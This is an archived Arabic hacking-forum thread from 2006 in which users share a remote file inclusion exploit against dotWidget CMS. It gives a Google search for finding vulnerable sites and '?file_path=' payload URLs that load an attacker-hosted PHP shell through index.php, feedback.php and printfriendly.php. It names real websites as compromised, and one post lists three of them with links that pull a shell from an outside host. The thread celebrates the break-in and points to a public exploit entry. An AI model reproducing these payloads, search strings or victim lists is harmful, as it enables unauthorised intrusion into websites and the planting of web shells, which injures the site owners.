المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرة dotWidget CMS بصور


souss212
07-06-2006, 07:58
الثغرة موجود في تلات ملفات :
index.php
feedback.php
printfriendly.php

تطبيق :

ابحث في غوغل عن : dotwidget Printer-friendly

http://souss216.ifrance.com/1.jpg

اختر موقع ::> نا اختارت الموقع : http://www.bumblebeek.com/index.php

http://souss216.ifrance.com/2.jpg


تم نظيف في الرابط :

?file_path=http://www.yourspace.com/yourscript.php?

http://www.yourspace.com/yourscript.php ::>> مكان الي نزلت به الشيل و بعد غير .php ب .dat في سيرفر بتاعاك

http://souss216.ifrance.com/3.jpg

مبروك الاختراق :

http://souss216.ifrance.com/4.jpg


http://souss216.ifrance.com/6.jpg

:d

souss212
07-06-2006, 07:59
/index.php?file_path=http://www.yourspace.com/yourscript.php?
/feedback.php?file_path=http://www.yourspace.com/yourscript.php?
/printfriendly.php?file_path=http://www.yourspace.com/yourscript.php?

BroKeN-ProXy
07-06-2006, 08:09
مشكور أخوي souss212 على الثغرة
بس الثغرة نازلة قبل يومين
رابط الثغرة في milw0rm
http://milw0rm.com/exploits/1879
سلام
أخوك بروكين

متكي ورا الشمس
10-06-2006, 04:05
يعطيك العافيه ,,

الثغرات بقسم الثغرات ,,,


ينقل...

edifier
10-06-2006, 07:04
الف الف شكر لك اخويه .. على هالثغره ..

و هذي بعض المواقع المصــابه .. :

http://www.safegunacademy.com/index.php?file_path=http://r1s.cc/shell.txt?

http://www.acel-qld.org.au/index.php?file_path=http://r1s.cc/shell.txt?

http://www.innovativetooling.com/index.php?file_path=http://r1s.cc/shell.txt?

ahmed10_13
07-03-2007, 11:02
thttp://nikon.bungie.org/logos/Halo%20Matrix%20Code.JPG